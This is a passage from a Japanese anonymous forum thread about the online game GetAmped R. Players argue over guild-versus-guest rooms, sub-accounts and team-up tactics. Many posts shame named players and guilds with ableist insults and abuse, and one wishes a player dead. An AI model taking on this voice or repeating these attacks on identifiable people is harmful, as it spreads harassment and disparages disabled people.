
137 :名無しさん@ゴーゴーゴーゴー!:2006/12/27(水) 19:54:57 ID:aOxw+Qoo
ギルド部屋たてるやつは信用できる身内と組んで勝ちたいから作る
けどそこにヒョコヒョコ入ってく馬鹿なカモが多いこともギル部屋主たちはよく知ってる
要するに部屋人は考えなしに入ってくる雑魚を狩って俺らTUEEEをしてるだけだ
入る奴も馬鹿だけどな

この際晒し見てる奴はギル部屋入らないようにしようぜ?


138 :名無しさん@ゴーゴーゴーゴー!:2006/12/27(水) 20:10:27 ID:7tPfmZHM
俺は俺の忠をつくすつもりだ・・・そして今夜もギルド戦へ乗り込んでいく。


139 :名無しさん@ゴーゴーゴーゴー!:2006/12/27(水) 21:08:51 ID:+sdUzz0w
この流れはヤバイ

140 :名無しさん@ゴーゴーゴーゴー!:2006/12/27(水) 22:40:16 ID:gE24Xxgf
自分のギルドに強い人がいなくて、ギルドVS部屋建てられないからって
ここでひがむのはやめよーぜ!!!

141 :名無しさん@ゴーゴーゴーゴー!:2006/12/27(水) 23:38:37 ID:QcXwpsKI
Ezの奴らの2nd

まりも


142 :名無しさん@ゴーゴーゴーゴー!:2006/12/27(水) 23:55:05 ID:P57sT/5l
奴らって誰だよwwww
誰か教えて

143 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 00:03:33 ID:JrvoQoz1
一人の名前しか出してないのに奴「ら」って…。
ここは日本語の不自由なインターネットですね。
Ezは嫌いだけどなwwwwwwwwwwwwwwwwwwwwwwwwww

144 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 00:26:00 ID:3nNX+EHY
ttp://tonosiki.mbnsk.net/pathos/doc/ga.htm
´・ω・

145 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 01:36:14 ID:Phqqcp6m
誰が入ってくるか分からないからおもしろい

それがギルドVS部屋クオリティ

146 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 01:41:35 ID:FurggpB4
>>129
全くその通り。

ギルドvs客部屋を立ててるギルドは腹を切って自害すべき。
ギルドvsギルドだったら全然文句は無い。

147 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 02:14:54 ID:NkwD5Wvg
フリーで文句言うなよ。
初心者は気をつけてねってちゃんと注意書き出るじゃん。

148 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 03:02:44 ID:TaK8v5kC
このスレを見ている人はこんなスレも見ています。(ver 0.20)
GetAmpedR Turbo17 [ネットゲーム]
GetAmpedR Turbo18 [ネットゲーム]
GetAmpedR Turbo17 [ネットゲーム]
L'Arc〜en〜Ciel統一スレッド vol.772 [邦楽グループ]

母「いい加減仕事探してきなさいよ」 [メンヘルサロン]


149 :あんこ ◆v2TRipIZ4s :2006/12/28(木) 03:03:43 ID:DLPF0wnR
ひひひ

150 :あんこ ◆FuckYouf2c :2006/12/28(木) 03:22:55 ID:DLPF0wnR
馬鹿が多いな

151 :あんこ ◆Or.......I :2006/12/28(木) 03:24:03 ID:DLPF0wnR
みんな寂しくないの?

152 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 05:07:56 ID:eRC/H7cI
>>147
いくらロビーの名前がフリーだからといって何でも自由なわけじゃないだろ。
いくら注意書きしたってギルドVS部屋に初心者が入ってきちゃうんだから、部屋作る側が配慮をしないといけない。
初心者を大切にしないと過疎を加速させるだけだぞ。
そういうこと考えられない馬鹿ばかりだから何度やっても廃れていくんだろうな。

153 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 05:35:54 ID:QWfjZhTJ
ギルドVS部屋に入って初心者がやめる理由は何?

154 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 06:37:22 ID:lCFyWifM
ギルドvs部屋は大抵強い人がいるので面白いのだが・・・
上手い人と対戦するのも、上達するには良いと思う。
やる気が続くかどうかはその人次第だけど。
むしろ質の悪い野良部屋の方が悪影響だろ・・・

155 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 06:47:49 ID:A8IH0OFi
リアルで俺の友達(初心者)がギルドvs客の狩り部屋でGARを止めた。
ギルドvs客なんぞ考えられない構図だな。

156 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 07:27:18 ID:fPhlLRI+
何その精神薄弱

157 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 07:54:08 ID:ZJH4QFCO
カチクと同じくらいの低脳が多いって事がわかった

158 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 08:04:55 ID:TaK8v5kC
ギルド部屋は今に始まったことじゃないんだけどな


159 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 08:06:01 ID:0/E2NYrg
前のGA住人なんてみんな痛いやつだけだろ?

160 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 08:07:17 ID:kNYDYDzO
ギルドvs客を擁護してる奴はギルド関係やその取り巻きだろうな。

161 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 08:31:04 ID:dHi5x8y+
勝てなくて悔しいって素直に言えよ

162 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 08:46:37 ID:V7VMMl1D
必死だな、ギルメン。
ギルメン同士でやれよ。

163 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 09:02:05 ID:UC6YrcQH
>>155
> ギルドvs客なんぞ考えられない構図だな。


他のネトゲでは確かに無いな。
そこまで有利な立場で勝ちたいのかと言いたい。
ギルド対客はGARにとってマイナスにはなるけど、プラスになる事は無いな。

164 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 09:20:31 ID:xc+6i1dd
ギルドvs部屋は難易度高いチャレンジみたいで面白いんだがなー
普段鍵部屋ばっかの人にも会えたりするし、チームワークを活かした戦い方は参考になる
現に強いギルドの部屋はいつも観戦者いっぱいだし
妬みでゲームの楽しみ減らすようなことはするなよ
あとデメリットであげられてる初心者のことだが、自分で挑んで負けたくらいで止めるようなやつならどうせ続かないだろ
ていうかお前らそんな初心者の心配なんてほんとはしてないんだろ

165 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 10:01:29 ID:ZJH4QFCO
強い奴=楽しめる
弱い奴=つまらない

てかさその初心者とやらは
初心者なのに誰にでも勝てるとでも思っちゃってるの?
初心者なんだからほとんどの人に負けてもおかしくないだろ
そんな事もわからないようで、たいそうに批判するもんじゃない

166 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 10:59:29 ID:dK6Ofhwh
結論:初心者と上達する気のないやつはギルドvs部屋に入るな。

167 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 11:46:47 ID:dHi5x8y+
入らなければ勝手に廃れる。
敵が有利だってのは部屋名から
判断して分かるだろうから入る
初心者にも少なからず問題がある。

仮にギルド部屋でボロ負けしたとして、それだけで辞めるっておかしいだろ。
もう少し強くなってから挑戦して見返してやろうとか思うのが普通だと思うけどな。
ゲームってのはそんなもんだろ。


168 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 11:47:14 ID:TZ8+DGYx
GAR\(^o^)/オワタ

169 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 11:50:34 ID:l/jwRPBa
お国柄のせいか、負けて悔しいとか、見返してやろうと思う奴なんてそうそう居ないんだよ。
だから対戦ネトゲは流行らないんだよな。

170 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 11:52:47 ID:h8dPBeZx
上級者にボコられる→うわっ何これツマンネ→MMOの方がみんなでできるし楽しいからそっち行こう

\(^o^)/

171 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 11:56:55 ID:H1Iwjf+x
>>144
URL削ったら同人サークルだったんだけど何コレwwwwww

172 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 12:26:57 ID:5hbUlhGT
>>144
俺もなった…きんもー☆

173 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 12:37:56 ID:v+K5kkUp
自分の価値観でしかものを見れず、現実を受け入れられないガキばっかりだな。
ギルド部屋はチャレンジとか、負けたら見返すのが普通とかいう考えは個人の考えで全員がそうではない。
そうじゃない奴は精神薄弱だのおかしいとか言ってると>>152の言うように過疎が加速するだけ。

癌時代だってギルド部屋でどんどん過疎っていったのを忘れてないか。
あの時はアクセ規制だのがあって終息がかなり早かった。
今回は勢いは弱いにしろ、段々と人口が減っているのは明らか。
これから生活環境がガラリと変わる時期だから引退者も続出だろう。

このままだとあと半年ももたないぞ

174 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 12:48:46 ID:ZJH4QFCO
癌時代を体験した者ならば、ギルド部屋でどんどん過疎が進んだ
なんて意見出てこないよ
それにだな、その一試合ボコられて引退する初心者君が
フリーの野良部屋入ったらボコられないで活躍できるとでも?

初心者を盾にして、ギルド部屋を叩きたいだけにしか見えないがね
「初心者は負けて当然」この当然の事も理解できてないのはおかしいよ
マンガじゃアニメじゃあるまいし、初めて数試合でいきなり上級者になれるわけなんてないんだよ。




175 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 12:49:27 ID:dHi5x8y+
>自分の価値観でしかものを見れず

こういう言葉使う奴も自分の価値観でしかものを見れてませんね。


176 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 12:54:08 ID:BDg4AQ+O
ネグロスって同人サークルって


キンモー☆

177 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 13:10:57 ID:xQnpqelR
軸ずらしD弱しかしないスパイがやばい
チーム戦でチキン戦法&弱い奴はめて点数稼ぎ
こんなんで勝っても面白くねー
最近見かけるアレな奴らの行動パターン
・とりあえずD弱、D強
・武器で軸ずらし1発止めわからん殺し
・得意武器

こんな戦法で点数稼げてるのが現状だからもっと強いアクセ出しちゃえよ

178 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 13:11:16 ID:NkwD5Wvg
ギルド部屋に入ってボコボコにされて辞めるような人は
ギルド部屋以外でもボコボコにされて辞めると思うんだが。
どこでやろうがフリー鯖では初心者はボコボコにされるよ。

179 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 13:13:23 ID:66Y4SXs+
つか、過疎の問題は運営側の宣伝力じゃない?
部屋のせい部屋のせいって言うけどさ
自分で建てれば解決するじゃん
〇〇vsお客さん みたいなタイトルはよっぽど日本語がわからない
人じゃない限り「ああこの部屋は自分は不利になって向こうは有利」
って理解できるし。


180 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 13:15:42 ID:NkwD5Wvg
>>177
スパイでほかにどうやって戦うんだよ
超人と違って攻撃力もなければアーマーと違って守備力もないんだぞ。
機動性とテク特化のスパイにガチンコしろとかアホじゃないかと

181 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 13:16:25 ID:ZJH4QFCO
D弱 D強普通に出すでしょ
君はD弱、D強使わないの?使わないの?
そんなんじゃ中級者なれないぞ

182 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 13:20:34 ID:BDg4AQ+O
スタイルの特性生かすことも考えない子にワロタ

183 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 13:43:17 ID:Eg7nCNJ2
いもむしとか雑魚集めてるギルドは例外だが、AKとかEzとかSmellSnowとか
強者集めてるギルドはそこまで必死に勝ちたいんだろ
ある程度年くってる大人ユーザーどもがこれじゃ、もうGAダメだね
GAオタワ\(^o^)/


184 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 13:53:34 ID:JrXcwk12
>>183
AKとEzはわかるが小雪はそうでもないさ

185 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 13:57:11 ID:N7KWKnKu
ANCを忘れてもらっちゃ困る

186 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 14:05:56 ID:4XRZ9DB4
ギルド部屋なんて野良でやったら連携やなにやらで勝てるわけねぇよな

それなのに建ててるのは俺TUEEEEEEEEってしたいやつだけだろ

もし、部屋主と同じレベルが2人入っても即席チームが勝てるわけないんだよ

EZの擁護が多いな

187 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 14:20:42 ID:3nNX+EHY
へへh

188 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 14:34:56 ID:btrt0Vtv
EZ必死杉ワロタ

189 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 15:09:47 ID:qwGyTJCq
ギルドで集まったときに出来るのがギルド戦ぐらいしかないのが問題。
ADじゃつまらんしねぇ。後出来ることといったらチャットぐらいか?あはは


190 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 15:15:39 ID:IN/63bGg
ギルドVS よりも 部屋人 VSの方が気になる

191 :177:2006/12/28(木) 15:17:33 ID:xQnpqelR
俺が対処できないんじゃなくて、この戦法だけで初心者が倒されて実質4:3試合が多すぎてやばい

192 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 15:24:18 ID:N7KWKnKu
おめーが守ってやれよ

193 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 15:30:56 ID:qwGyTJCq
2Dゲーなら暴れでもなんとかなるけど、
3Dになると2Dに比べて大幅に自由度が増すから、
初心者もその分つらくなるよね。ゲームの性質上、しょうがないんじゃない?

194 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 16:20:34 ID:X2TUqZK8
ネグロス、ロミオ信者かよ
きめえ

195 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 17:19:40 ID:3nNX+EHY
>>194 仏教信者かよ
きめぇ

196 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 19:00:49 ID:Eg7nCNJ2
ネグロスってあの精神障害者だろ?
青ガン使っただけでかなり文句言ってくるし、死に掛けると逃げまくる奴

197 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 19:33:45 ID:3nNX+EHY
スレを察するに、人間の憎悪が出てきているスレですね。

・・・楽しいですか?

晒されている、一部の人はあなた方が言う障害者でも某ギルドみたいに必死に勝ちたいギルド、実際会ってきたが、全部が全部悪い人じゃないじゃないですか。
必死に強がるギルドでもなく、戦略がセコイ、言動が幼い、大人ユーザーがどうのこうの言ってる人々じゃなく
晒している本人が一番憎悪に満ちていると思いました。

数ヶ月前からこのスレを見た感想ですが、暴言や良識の無い方だけ晒して、戦略やギルドがどうのこうの言って晒すのははっきりいって、晒す本人が可愛そうです。
GA終わったとか申しますけど、終わったと決めたのならアンインストールしてみてはどうでしょう。

長々と文章を打って申し訳ないですが、率直な感想です。
いつもどおりたたいても結構です。お得意な必死やワロタ、本人乙など何べんでもたたいてかまいません。

それで晒してる人達が満足するならそれはそれでいいんじゃないかと思いますよ。

Byロイクス



198 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 19:49:31 ID:Oazi1lX4
>>197
Byロイクスで味噌汁吹いた

199 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 19:57:20 ID:3nNX+EHY
^w^来年ともどもよろしく

親愛なるロイクス

200 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 19:57:55 ID:VTkrvL6C
ネタなのかマジレスなのか分からんwww

201 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 20:26:28 ID:dK6Ofhwh
ID:3nNX+EHY

202 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 20:33:43 ID:+/XhhNic
正直に言わせていただきますと
卑怯だとかなんとかいって
自分が勝てないからそうやって晒してるんじゃないですか?
晒したほうが勝ちですか?
チートの類でサイバーステップ側が考慮してないことで
勝とうとするのは卑怯ですが
↑に晒されてきた内容はすべてサイバーステップ側が考慮されてることだと思います
それでも卑怯だと思うならそれは
ただ勝てないから勝てるように相手を制圧しようとしてるようにしか見えません
叩いていただいて結構です。

203 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 20:36:08 ID:+/XhhNic
sage

204 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 20:39:05 ID:w7PsL2/B
残念。ロイクスにしては文章が綺麗すぎる

205 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 20:44:55 ID:Eg7nCNJ2
どう見ても釣られすぎ

206 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 21:04:47 ID:AhEfgov3
誰か6のサイトはってくれ

207 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 21:09:47 ID:J7MKyTUT
http:///www.666.com

208 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 21:24:28 ID:CmCEmE1V
http://im666.net/

209 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 21:33:32 ID:3nNX+EHY
スレを察するに、人間の憎悪が出てきているスレですね^w^

・・・楽しいか?厨房ども

晒されている、一部の人はおまえらが言うガイシャでもクソギルドみたいにきもいギルド、実際会ってきたが、全部が全部悪い人じゃねぇよ^^俺とか最高じゃん
必死杉ギルドじゃなくて、戦略がクソ、言動が幼い、ビチクソユーザーがどうのこうの言ってるクソドモよりか
晒しているお前らが一番ザコなんだよ^^

暴言や良識の無い方だけ晒してしやがってくそ
GA終わったとか申しますけど、終わったと決めたのならアンインストールしてろ、GAオワタ^o^

おらおら、釣られろよくそどもwwwwwwwwwww

Byロイクス

210 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 21:35:25 ID:3nNX+EHY
てかだれかスロタ手伝えよ

ロイクス様なめてると痛い目見るぜ!

211 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 22:09:24 ID:w7PsL2/B
ロノロアゾロ
サバイバル八百長っと・・・

あいつの頭の中では「同ギルド=サバでの助け合い」なんだと。

212 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 22:36:40 ID:xQnpqelR
ベルベールとスババーンサバで組んでる
挙動が不自然でばればれ

213 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 22:49:00 ID:w7PsL2/B
たまに攻撃当てて「ごめん」言う奴とかいるけどなw
お前ら馬鹿じゃないのかと思いつつぶっ倒すが。

214 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 23:20:25 ID:db5tUxDd
みんなもっとプロサーバー活用しようぜ!
GMももっとプロサーバー活性化させるための策を検討するべきだ。
たとえばプロサーバーで500回以上戦わないと取れないアクセとか、
プロサーバーでしかできないチャレンジ。
更にはプロサーバーでしか取れない称号と、
称号によって得られる特殊効果などなど!
うは!夢が!広がりんぐwwwwwwwwwwwwwwwwww

215 :名無しさん@ゴーゴーゴーゴー!:2006/12/28(木) 23:51:03 ID:OwPYGfQm
>>186
> EZの擁護が多いな

ギルメンは勿論晒しスレよんでるし、名無しでかなりギルドvs客部屋を擁護してんな。
ついでにその取り巻きも。

216 :名無しさん@ゴーゴーゴーゴー!:2006/12/29(金) 00:01:45 ID:4XRZ9DB4
ベルベーレとスパパーンは兄弟なんだぜ?

217 :名無しさん@ゴーゴーゴーゴー!:2006/12/29(金) 00:28:00 ID:xu/H+Yd/
>>214

韓国or台湾GAは、黄色ライオン↑は
プロ鯖で1000000稼げばなれる。

218 :名無しさん@ゴーゴーゴーゴー!:2006/12/29(金) 01:18:58 ID:gLPFT9xJ
摩天楼って奴、始終SC出てるな。
鯖でもゲームモードでも特定の人物や特定の単語を
透明あぼーんに近い設定できるようにならんかな。

219 :名無しさん@ゴーゴーゴーゴー!:2006/12/29(金) 09:35:19 ID:lCGZ9elP
とりあえず、アレだEZ乙

220 :名無しさん@ゴーゴーゴーゴー!:2006/12/29(金) 11:06:56 ID:9vrlOqLA
サブ多すぎ。
さっきも どらんご ってやつが「俺サブだよ」って自慢げに話してたし・・・

221 :名無しさん@ゴーゴーゴーゴー!:2006/12/29(金) 11:37:09 ID:PUJUow6B
そういう奴はSSとって通報すればいい

222 :名無しさん@ゴーゴーゴーゴー!:2006/12/29(金) 11:44:30 ID:OqbZfI7m
サバイバルで同じギルドの人と出会えば協力して勝つのは当然だと思うんだけどな

223 :名無しさん@ゴーゴーゴーゴー!:2006/12/29(金) 11:44:59 ID:6VwYpMtK
子供って、やってはいけない事をやりたくなるだろ
そういうこと。

224 :名無しさん@ゴーゴーゴーゴー!:2006/12/29(金) 13:12:44 ID:PUJUow6B
サバで組むのはどう考えてもクソだろ

225 :名無しさん@ゴーゴーゴーゴー!:2006/12/29(金) 13:33:32 ID:6VwYpMtK
サバイバルで同ギルドと会ったら
「○○さんか。同ギルドだし、お互い全力で戦おう」
じゃね。

226 :名無しさん@ゴーゴーゴーゴー!:2006/12/29(金) 14:02:13 ID:nYXIc6lr
互いの利益になるのなら、サバで手を組むのも戦法だろ


227 :名無しさん@ゴーゴーゴーゴー!:2006/12/29(金) 14:04:44 ID:+k3B+zyO
Synergayも堂々とサブでやってるけど消されてないし、
菓子王ことピースも堂々とサブでやってるが消されてない。
そういうこと。サブは今のとこ合法なんだよ。

228 :名無しさん@ゴーゴーゴーゴー!:2006/12/29(金) 14:23:14 ID:nYXIc6lr
合法というか、中の人によるみたいだな
GMに嫌われていると処分食らう


229 :名無しさん@ゴーゴーゴーゴー!:2006/12/29(金) 14:28:38 ID:EIYxSz/S
セルフィとかセルフィとかセルフィとかセルフィとかセルフィとかセルフィとかセルフィとかセルフィとかセルフィとかセルフィとかセルフィとかセルフィとか

230 :名無しさん@ゴーゴーゴーゴー!:2006/12/29(金) 15:26:03 ID:Zr/YqTht
>>227
SynergyはGMにサブ作るって断ってから作ったらしいぞ
つまり、そういうことだな

231 :名無しさん@ゴーゴーゴーゴー!:2006/12/29(金) 16:51:27 ID:tx3q69gQ
>>230
CB終わり頃、GMに好かれている俺が初心者支援という名目で別垢について聞いてみたところおkと言われた・・・
つまり、そういうこと

232 :名無しさん@ゴーゴーゴーゴー!:2006/12/29(金) 17:16:29 ID:qVx44suc
クロロア:GARも腐ってきたな・・・(閉鎖誓いかも
クロロア:最近厨アクセ人増えてきたねー

そのあとブラスターガン緑持ち込んでました^^

233 :名無しさん@ゴーゴーゴーゴー!:2006/12/29(金) 17:42:36 ID:qVx44suc
すまん訂正
クロロア:最近厨アクセ使う人増えてきたねー

234 :名無しさん@ゴーゴーゴーゴー!:2006/12/29(金) 18:19:58 ID:OEpwChWR
発言で晒したいならSS撮っとけよ無能。
だからつまらん誤字で無駄レスするハメになるんだよ。

235 :名無しさん@ゴーゴーゴーゴー!:2006/12/29(金) 18:21:35 ID:nYXIc6lr
GAの終わりが近いって、oβ開始直後から言ってるよなクロロア
「ガンホー運営だしGAの終わりは近いよ」
って言ってるのを見た時は、ツッコミたくてストレスが溜まったもんだ


236 :名無しさん@ゴーゴーゴーゴー!:2006/12/29(金) 18:50:13 ID:qVx44suc
http://youandj.info/up/img/you0024.png

237 :名無しさん@ゴーゴーゴーゴー!:2006/12/29(金) 19:06:13 ID:PUJUow6B
クソロアってそんな昔からいたの?そのわりに弱いけど・・・


238 :名無しさん@ゴーゴーゴーゴー!:2006/12/29(金) 19:54:36 ID:nEsqaRp3
厨アクセ使う人増えたっていってるが自分は含まれてないとでも思ってるのか

239 :名無しさん@ゴーゴーゴーゴー!:2006/12/29(金) 20:53:16 ID:PUJUow6B
1ロイクス
2口イクス
3ロィクス
4ロイワス

ロイクス大人気ですね

240 :名無しさん@ゴーゴーゴーゴー!:2006/12/29(金) 21:10:33 ID:xu/H+Yd/
小雪メンバーはGvs客しかしないのか?

241 :名無しさん@ゴーゴーゴーゴー!:2006/12/29(金) 21:25:12 ID:HumZpBzw
死んだら「あ」とか「え・・・」を連発するやつが多すぎる。
潔く「ぎゃああああああ!」でいいだろ。
あと「こんにちわ」とかさ。

242 :名無しさん@ゴーゴーゴーゴー!:2006/12/29(金) 22:04:25 ID:E7bHGuez
小雪はおれつええギルドだから許してやってくれ
大会いつもでてるけど、コロっとすぐまけてるし

243 :名無しさん@ゴーゴーゴーゴー!:2006/12/29(金) 22:46:01 ID:RZOovfjE
ペタと小雪は最近メンバー増えたてるがなんかろくなやついねーな

244 :名無しさん@ゴーゴーゴーゴー!:2006/12/29(金) 22:48:04 ID:x97Ucr8C
>>241
3行目で吹いた。

245 :名無しさん@ゴーゴーゴーゴー!:2006/12/30(土) 01:26:49 ID:8+ZxRoxG
ペタにみーやが入ってたな、あんな雑魚でも入れるのか

246 :名無しさん@ゴーゴーゴーゴー!:2006/12/30(土) 04:09:26 ID:kAik7YuI
>>229
禿げ上がるほど同意。
あの屑こと、セルフィFCは冗談抜きで死んで欲しい。

247 :名無しさん@ゴーゴーゴーゴー!:2006/12/30(土) 04:12:04 ID:kAik7YuI
>>243
小雪ってのはイマイチ知らんが、ペタは屑共の寄せ集め。

248 :名無しさん@ゴーゴーゴーゴー!:2006/12/30(土) 04:48:20 ID:7vfx/Hwz
復帰しようかな

249 :ポチFC:2006/12/30(土) 04:51:06 ID:7vfx/Hwz
↑ミス;w;
ポチFC様復帰しようかなぁ
でもGM様たちにばれないようにしないと;;
とりあえず、REALかペタジーニか小雪かタロッツかALLKILLに入りたいな;w;

250 :ポチFC ◆XksB4AwhxU :2006/12/30(土) 04:53:01 ID:7vfx/Hwz
トリップわすれたあああああ
とりあえずチスミーさまに依頼したスキンが完成したら復帰するお;;
またポチ様最強伝説がはじめるおおおおおおおぉ

251 :名無しさん@ゴーゴーゴーゴー!:2006/12/30(土) 04:59:45 ID:TKiysE+L
ましんは強いほうばっかりにいくよな

252 :名無しさん@ゴーゴーゴーゴー!:2006/12/30(土) 05:11:42 ID:pvBjgaIi
おいおい、ましんにてこずるの?
どんだけ弱いんだ
敵に行っても困らんだろあんなん
雑魚いなー

253 :名無しさん@ゴーゴーゴーゴー!:2006/12/30(土) 05:35:59 ID:TKiysE+L
雑魚がついてくるのがウザイんだよ。
勘違いすんなよ;;;

254 :名無しさん@ゴーゴーゴーゴー!:2006/12/30(土) 05:41:27 ID:pvBjgaIi
いーや
きっと弱いね
統計的にみて、負けて晒しが一番多い


255 :ポチFC ◆XksB4AwhxU :2006/12/30(土) 07:11:25 ID:7vfx/Hwz
>>253
うるさい
IDがTKのくせに!

256 :名無しさん@ゴーゴーゴーゴー!:2006/12/30(土) 08:20:46 ID:sprgCd1V
ポチってさ、
復帰→引退試合かけ負けて引退→復帰

この繰り返しすぎていい加減飽きた^w^

257 :名無しさん@ゴーゴーゴーゴー!:2006/12/30(土) 09:33:54 ID:uk62hEXe
>>256
あの屑、構ってちゃんでありレス乞食だからなー。

258 :ロイクス:2006/12/30(土) 11:16:38 ID:Gby/QBip
本人降臨!

259 :名無しさん@ゴーゴーゴーゴー!:2006/12/30(土) 11:20:39 ID:PGHa1JRk
>>251
強い方にしかいかない、と晒したら必ず「そんな雑魚にも勝てないお前が悪い」みたいなレスしか返ってこないからやめとけ
ましんぐらい戦跡重ねた奴なら勝てない奴がいてもおかしくない。俺も勝てないかも。>>252みたく自分が強いなんて思ってないし。
強い方にしかいかない=そこまで勝ちに必死な人
って事を言いたいんだよ

260 :名無しさん@ゴーゴーゴーゴー!:2006/12/30(土) 12:18:08 ID:pvBjgaIi
勝てないと、勝ちに必死すぎとか
勝てない人は何らかの形で言う人は言うぜ?
お前らが普段バカにしてるロイクスと、ぶっちゃけ大差ねーよ
集団で妬むもんだから、多少無茶な中傷でもまかり通る
反吐が出るね


261 :名無しさん@ゴーゴーゴーゴー!:2006/12/30(土) 12:28:47 ID:PGHa1JRk
>>260
言い方が悪かったな
別に俺が勝てないから妬む気持ちで強い人に「勝ちに必死な人」と言ったのではなく
TDでも強い方にしかいかない奴は、そうまでして勝ちの喜びを得たいのか?て事だよ
強い人と逆のチームになって、自分を高めようとか、むしろ勝って見返すぐらいの向上心はないのかと

262 :名無しさん@ゴーゴーゴーゴー!:2006/12/30(土) 12:58:24 ID:fL3yWqt0
またEzがギルドvs客の狩り部屋立ててんな

263 :名無しさん@ゴーゴーゴーゴー!:2006/12/30(土) 12:58:49 ID:fBhEpgMN
こんなとこでそんな議論するなら早くランダムでチーム決まるようにしてくださいってメール送ろうぜ

264 :名無しさん@ゴーゴーゴーゴー!:2006/12/30(土) 13:00:04 ID:pvBjgaIi
>>253のレスを見てみるかぎりさ
もし、ましんが味方につけば雑魚は相手に行くから狩れるって事だろ?
それがお望みって言ってるようなもんだよな
結局は自分が勝ちたいから、相手に文句言ってるんだよ

>>261
それは、普段勝てないからその行動に至るわけで
勝ちを味わってない人程勝ちたいんだろ
大体、逆のチーム行って空きが出るから誰かしら行くことになるだろ?
自分が行くことになるかもしれんぞ
それに「強い人〜向上心はないのか」って言ってるけど
その強いほうに付かれたTDこそも、勝って見返すTDではないか?
強い人と逆のチームなったなら多少のアドバンテージあるのは当たり前だろ?
それを了承した上でなんで文句を言うかねって話
「〜は強いほうにしか行かない」これがあいまいすぎる
何故それが気にいらないか明記すべき
上級者なら、流石に呆れたとしかいえないけど
中級クラスなら相手が初心者ばかりと言う以外さしてバランス崩れない
それと妬みレスかちゃんとしたレスか判断する事も大事だぞ
妬みレスは事実を多少歪曲してでも、自分が被害者ぶる




265 :名無しさん@ゴーゴーゴーゴー!:2006/12/30(土) 13:07:54 ID:pVT3WB3t
by ロイクス

266 :名無しさん@ゴーゴーゴーゴー!:2006/12/30(土) 14:37:24 ID:F+C6TZ1Y
イエロオオー相当ひどいな
ロビーにいるチャレ上位者に片っ端から「手伝って〜」
これだけでロビー流しっぱなし

引き受けるやつも引き受けるやつだけどな


267 :名無しさん@ゴーゴーゴーゴー!:2006/12/30(土) 17:01:23 ID:xcAqYwbJ
ブヒヒヒヒ

268 :名無しさん@ゴーゴーゴーゴー!:2006/12/30(土) 17:05:50 ID:e0IrBAEp
なんという長文ワロタ

269 :名無しさん@ゴーゴーゴーゴー!:2006/12/30(土) 21:52:51 ID:/I/LrTqg
ちょwwwwアンプドマンキモスwwwwww

270 :名無しさん@ゴーゴーゴーゴー!:2006/12/30(土) 22:03:33 ID:N7zqbvdf
>>269
詳しく。

271 :名無しさん@ゴーゴーゴーゴー!:2006/12/30(土) 22:26:42 ID:QHvoCcEW
装甲ってやつもロビーで五月蝿いな

